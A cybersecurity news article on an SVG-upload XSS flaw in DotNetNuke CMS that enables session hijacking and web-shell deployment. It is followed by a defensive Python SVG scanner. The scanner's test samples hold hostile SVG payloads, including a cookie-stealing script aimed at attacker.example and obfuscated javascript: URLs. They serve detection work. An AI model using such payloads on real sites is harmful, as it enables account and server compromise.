Security News

Cybersecurity news aggregator

Severity: HIGH | Category: Vulnerabilities | Source: SC Media

DotNetNuke CMS vulnerability allows server compromise via malicious SVG uploads

A cross-site scripting (XSS) vulnerability (CVE-2026-40321, CVSS 8.0 HIGH) in DotNetNuke CMS allows an authenticated attacker to upload a malicious SVG file; when a privileged user opens the file in the browser, the embedded JavaScript executes with that user's authenticated session, enabling session hijacking and web shell deployment for server compromise. The flaw affects DNNSoftware DotNetNuke versions prior to 10.2.2. Administrators should upgrade to version 10.2.2, review user registration policies, and disable anonymous file uploads if they are not required.

Vulnerability Management, Patch/Configuration Management

April 30, 2026 | By SC Staff

As reported by Tech Radar, a cross-site scripting (XSS) vulnerability in the DotNetNuke CMS lets attackers chain exploits and take control of web servers. The flaw, CVE-2026-40321, affects the popular open-source platform built on Microsoft technology.

According to Pentest Tools, an attacker with a registered account uploads an SVG file that contains JavaScript, passing it off as an ordinary image. When a privileged user opens the file, the embedded payload runs in the browser under that user's authenticated session. Acting as the victim, the script then calls an authenticated endpoint that writes a file to the server and drops a web shell, giving the attacker persistent access.

Because the attack uses a legitimate file type and ordinary HTTP traffic, it can slip past traditional defenses such as antivirus and firewalls. A patch exists; administrators should apply it and also review user registration policies and disable anonymous file uploads where they are not needed. The attack requires a registered account, the ability to upload SVG files, and a privileged user opening the malicious attachment.

Source: Tech Radar

Related:
- Critical cPanel vulnerability actively exploited in the wild (SC Staff, April 30, 2026): the vulnerability stems from a Carriage Return Line Feed (CRLF) injection flaw within the login and session loading processes of cPanel & WHM.
- CISA adds ConnectWise, Microsoft flaws to KEV catalog (Laura French, April 30, 2026): the Windows flaw stems from an incomplete patch of a vulnerability exploited by APT28.
- GitHub vulnerability CVE-2026-3854 allows code execution with a single git push (SC Staff, April 29, 2026): the vulnerability arises from improper handling of special elements within GitHub Enterprise Server.
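The mechanism described above (an SVG that is really a script carrier, opened in a browser with a privileged session) is what an upload handler has to refuse before the file is ever stored. The following is an added example, not code from SC Media, Tech Radar, Pentest Tools, or the DotNetNuke project: a Python check that parses a candidate SVG and reports every feature that can execute script or pull in foreign content (script elements, event-handler attributes, javascript: URLs with scheme obfuscation, SMIL animation of href, foreignObject, external stylesheets, and DTDs, which are refused before the XML parser ever sees them). The function names and the sample files are constructed for illustration and are not taken from the advisory.

```python
"""Reject SVG uploads that can carry script (the stored-XSS vector above)."""
import re
import xml.etree.ElementTree as ET

# Elements that execute script or embed foreign (HTML/external) content.
ACTIVE_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object", "handler"}
# SMIL animation elements can rewrite an href to javascript: at runtime.
ANIMATION_ELEMENTS = {"animate", "set"}


def local_name(qualified: str) -> str:
    """'{http://www.w3.org/2000/svg}svg' -> 'svg' (works for attribute keys too)."""
    return qualified.rsplit("}", 1)[-1]


def scan_svg(data: bytes) -> list[str]:
    """Return a list of findings; an empty list means no active content was seen."""
    findings: list[str] = []
    lowered = data.lower()
    # A DTD enables entity-expansion tricks; refuse it before parsing at all.
    if b"<!doctype" in lowered:
        return ["DOCTYPE/DTD present"]
    if b"<?xml-stylesheet" in lowered:
        findings.append("xml-stylesheet processing instruction")
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return findings + [f"not well-formed XML: {exc}"]
    if local_name(root.tag).lower() != "svg":
        findings.append(f"root element is <{local_name(root.tag)}>, not <svg>")
    for el in root.iter():
        raw = local_name(el.tag)
        name = raw.lower()
        if name in ACTIVE_ELEMENTS:
            findings.append(f"<{raw}> element")
        if name == "style" and re.search(r"url\s*\(|@import", el.text or "", re.I):
            findings.append("<style> loads an external resource")
        for attr, value in el.attrib.items():
            aname = local_name(attr).lower()
            # Browsers ignore control characters inside a URL scheme ("java\tscript:");
            # normalise the same way so the check cannot be bypassed with whitespace.
            norm = re.sub(r"[\x00-\x20]", "", value).lower()
            if aname.startswith("on"):
                findings.append(f"event handler {aname} on <{raw}>")
            if name in ANIMATION_ELEMENTS and aname == "attributename" and norm.endswith("href"):
                findings.append(f"<{raw}> animates href")
            if norm.startswith(("javascript:", "vbscript:")):
                findings.append(f"script URL in {aname} on <{raw}>")
            elif aname == "href" and norm and not norm.startswith("#"):
                findings.append(f"non-local href {value!r} on <{raw}>")
    return findings


def is_safe_svg(data: bytes) -> bool:
    """Policy helper for an upload handler: store only files with no findings."""
    return not scan_svg(data)


# Constructed sample files (not from the advisory): one benign, five hostile.
BENIGN_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">'
              b'<circle cx="5" cy="5" r="4" fill="#c00"/></svg>')
SCRIPT_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg"><script>'
              b'new Image().src="//attacker.example/?c="+document.cookie'
              b'</script></svg>')
ONLOAD_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)">'
              b'<rect width="1" height="1"/></svg>')
ANIMATE_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" '
               b'xmlns:xlink="http://www.w3.org/1999/xlink">'
               b'<a xlink:href="#"><rect width="9" height="9"/>'
               b'<animate attributeName="xlink:href" values="java\tscript:alert(1)" begin="0s"/>'
               b'</a></svg>')
FOREIGN_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg"><foreignObject width="1" height="1">'
               b'<body xmlns="http://www.w3.org/1999/xhtml"><img src="x" onerror="alert(1)"/>'
               b'</body></foreignObject></svg>')
DTD_SVG = (b'<?xml version="1.0"?><!DOCTYPE svg [<!ENTITY x "x">]>'
           b'<svg xmlns="http://www.w3.org/2000/svg">&x;</svg>')

if __name__ == "__main__":
    for label, sample in [("benign", BENIGN_SVG), ("script", SCRIPT_SVG),
                          ("onload", ONLOAD_SVG), ("animate", ANIMATE_SVG),
                          ("foreignObject", FOREIGN_SVG), ("dtd", DTD_SVG)]:
        print(f"{label:14} safe={is_safe_svg(sample)!s:5} {scan_svg(sample)}")
```

Scanning is the first line of defense, not the last: even a clean SVG should be served from user-upload paths with Content-Disposition: attachment and X-Content-Type-Options: nosniff, or from a separate origin with a restrictive Content-Security-Policy, so that a file which slips through cannot run in the CMS origin where the privileged user's session cookies live.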
